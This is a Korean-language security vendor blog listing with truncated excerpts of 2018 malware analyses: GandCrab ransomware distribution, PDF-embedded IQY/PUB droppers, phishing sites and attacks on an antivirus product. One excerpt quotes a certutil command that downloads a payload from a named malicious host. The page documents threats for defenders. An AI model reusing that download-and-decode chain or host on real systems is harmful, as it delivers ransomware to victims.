악성코드 정보1153 PDF 파일에 첨부되어 유포 중인 악성코드 (*.pub, *.iqy) 안랩 ASEC 지난 8월 PDF 파일의 첨부 파일 형태로 IQY와 PUB 확장자 악성코드가 유포 중인 것을 확인하였다. 확인된 PDF 첨부 파일의 확장자에 대해서 간략히 설명하면, *.iqy 확장자는 엑셀에서 사용하는 인터넷 쿼리 파일 형식이고, *.pub확장자는 MS Office의 Publisher와 관련된 프로그램의 확장자이다.다음 [그림 1]과 [그림 2]는 IQY, PUB 악성코드가 첨부된 PDF 악성코드의 동작 과정을 설명한 것이다. 결과적으로 악성 매크로를 실행하는 것을 확인할 수 있다. [그림 1] IQY 확장자를 포함한 PDF 파일의 악성 행위 과정 [그림 2] PUB 확장자를 포함한 PDF 파일의 악성 행위 과정 해당 PDF 실행 시 [그림 3]과 같은 실행 경고 창이 뜨면서 PDF 내부.. 2018. 9. 10. 배치파일(*.bat) 형태로 유포되는 GandCrab v4.3 (certutil.exe) 안랩 ASEC은 9월 6일 배치파일(*.bat) 형태로 유포되는 Gandcrab v4.3을 발견하였다. 이 배치파일은 certutil 이라는 윈도우즈 기본 명령을 이용해 동작한다. 동작하는 과정은 먼저 특정 URL에서 파일을 다운로드 받는다. 다운로드 받은 바이너리는 서명 파일인것처럼 위장한 BASE64형태로 인코딩 되어있다. 그리고 -decode 옵션을 이용해 Base64 디코드 후 cab 파일로 저장한다. cab파일은 압축 파일로 -expand 옵션으로 압축해제 후 실행하면 Gandcrab 랜섬웨어가 실행된다. [그림-1] 동작 방식 certutil -urlcache -split -f http://files.occarlsongracieteams.com/x/gate.php %TMP%\ercg345c24.. 2018. 9. 7. 구글 한국어 웹 검색 시 노출되는 GandCrab 유포 자바스크립트 안랩 ASEC은 자바스크립트를 통한 갠드크랩 랜섬웨어 유포 방식관련하여 8월 29일자 ASEC블로그를 통해 공개하였다. (참고: http://asec.ahnlab.com/1152)9월 4일자 '구글 검색 통해 안랩 V3 제거 유도하는 갠드크랩 랜섬웨어 발견' 제목의 보안뉴스 기사에 소개된 내용은 이러한 자바스크립트 파일이 유포되는 방식 중 하나를 나타낸다.- https://www.boannews.com/media/view.asp?idx=72715구글 브라우저를 통해 한국어 웹으로 특정 단어를 검색 시, 상단에 노출되어 일반 사용자로 하여금 다운로드 및 실행을 유도하고 있다. 아래의 [그림-1]은 "petools"라는 단어를 한국어 웹으로 설정하여 검색 시, 갠드크랩 랜섬웨어 유포와 관련된 사이트가 노출된.. 2018. 9. 6. 특정 타겟을 목표로 유포되는 피싱공격 안랩 ASEC은 최근 매일같이 기업사용자의 계정정보를 탈취하려는 피싱 사이트가 기승을 부리고 있는 것을 포착하였다. 최근에는 사용자를 속이기 위해 매우 정교해지고 있어 확인되지 않은 외부 URL 접근에 대한 각별한 주의가 필요하다. [그림-1] 기존 유포 피싱 사이트기존 피싱 사이트의 경우 상기 [그림-1]의 왼쪽 상단처럼 기업 로고만 도용하여 허술하게 제작되어 계정 입력란만 활성화가 되어있었다. 해당 사이트에서 연결된 페이지는 제작하지 않아 상기 그림의 빨간 박스안에 링크는 모두 비활성화 되어 클릭 되지 않는다. 해당 링크를 클릭시 다른 페이지로 연결되지 않아 사용자가 조금만 주의를 기울이면 정상적으로 서비스 되는 사이트가 아닌 것을 인지할 수 있었다. 하지만 비교적 최근 피싱 사이트는 사용자의 계정을.. 2018. 9. 5. 파워쉘을 이용하여 유포 중인 GandCrab v4.4 (Kill-Switch) 안랩 ASEC은 지난 8/29일 “자바스크립트 내에 포함된 GandCrab 랜섬웨어”에 대해 분석 정보를 블로그에 게시하였으며 랜섬웨어 실행하는 2가지 방식 중 내부에 암호화된 형태로 포함된 갠드크랩은 4.3 버전이고, 파워쉘을 통한 다운로드(http://pastebin.com/raw/***) 방식에 의해 구동되는 갠드크랩의 버전은 4.4임을 확인할 수 있었다. (참고: http://asec.ahnlab.com/1152) 4.4버전은 파일리스(Fileless)로 동작한다는 것 이외에 현재까지 알려진 갠드크랩과 기능이 전체적으로 유사하였으며, 특이사항으로 암호화 차단(Kill-Switch)기능을 수행하는 lock 파일 존재 여부를 확인하는 코드가 재등장하였다. 단, 기존의 고정된 이름과 달리 매일매일 lo.. 2018. 9. 3. 고정된 하나의 공개키를 사용하는 GandCrab v4.x 올해 초부터 등장한 GandCrab의 열기는 식을 줄 모르고있다. 지속적 변형으로 현재까지 v4.4로 업그레이드되어 유포 중임을 확인하였는데, 4버전 대의 GandCrab에서 특이한 점은 이전 버전들과 다르게 네트워크 통신이 없이도 파일 암호화를 수행한다는 것이다. 공개키를 사용하는 랜섬웨어에서는 C&C를 통해 피해 PC의 공개키를 공격자에게 전송하고, 그 키와 매칭이 되는 개인키는 공격자만이 알고 관리하는 방식이 보통이다. 그렇다면 ‘공개키를 공격자에게 전송하지 않는 GandCrab v4.x는 어떻게 공격자가 개인키를 관리할 수 있을까?’에 대한 의문을 시작으로 자사에서는 6월 말부터 확인 된 v4.x의 GandCrab(v4.0, v4.1, v4.1.2, v4.1.3, v4.2, v4.2.1, v4.3.. 2018. 8. 30. 자바스크립트 내에 포함된 GandCrab 랜섬웨어 (V3 제거유도) 안랩 ASEC 에서는 국내로 유포되는 갠드크랩 랜섬웨어의 유포과정을 모니터링 중 갠드크랩 유포 스크립트에서 V3 Lite 제품에 대해 제거(Uninstall)를 유도하는 기능을 발견하였다. (V3 Lite 제품만을 타겟으로 함)[그림 1] - 난독화된 스크립트 코드 유포 스크립트는 [그림 1]과 같이 난독화된 자바스크립트가 포함되어있으며, 난독화 해제 시 [그림 2]와 같은 자바스크립트의 메인 함수를 확인 할 수 있다.[그림 2] - 복호화된 스크립트 코드 [그림 2]에 복호화된 자바스크립트는 두 가지 방법을 통해 갠드크랩 랜섬웨어를 실행한다. 2번 항목의 파워쉘을 이용한 방법으로 다운로드되는 갠드크랩의 경로는 http://pastebin.com/raw/**** 형태로 확인되었다. (상세한 동작방식은 기.. 2018. 8. 29. 안랩 V3 Lite 제품 사용자를 공격하는 GandCrab v4.2.1 2018년 8월 1일 수집된 GandCrab(갠드크랩) v4.2.1 버전에는 안랩 V3 Lite 제품를 공격하는 기능이 추가되었다. 아래 부분은 GandCrab v4.2.1에서 이전 버전과 달라진 점이다.파일 외형 변경프로세스 할로잉을 통해 내부 핵심 GandCrab 파일 구동Anti-VM 기능 삭제V3 Lite 제품을 공격하는 코드 추가특히 이번 v4.2.1 GandCrab 에서 가장 특징적인 부분은 안랩 V3 Lite 제품을 공격하는 코드가 추가되었다는 점인데, 파일 암호화 이후에 해당 기능이 동작하도록 하였다. 2018년 8월 2일에 신규 수집된 GandCrab v4.3 에서도 위와 동일한 V3 Lite 제품 공격 기능이 확인되었으며, V3 Lite 최신 버전 3.3.46.2 부터는 해당 공격에 영.. 2018. 8. 13. 이전 1 ··· 25 26 27 28 29 30 31 ··· 145 다음
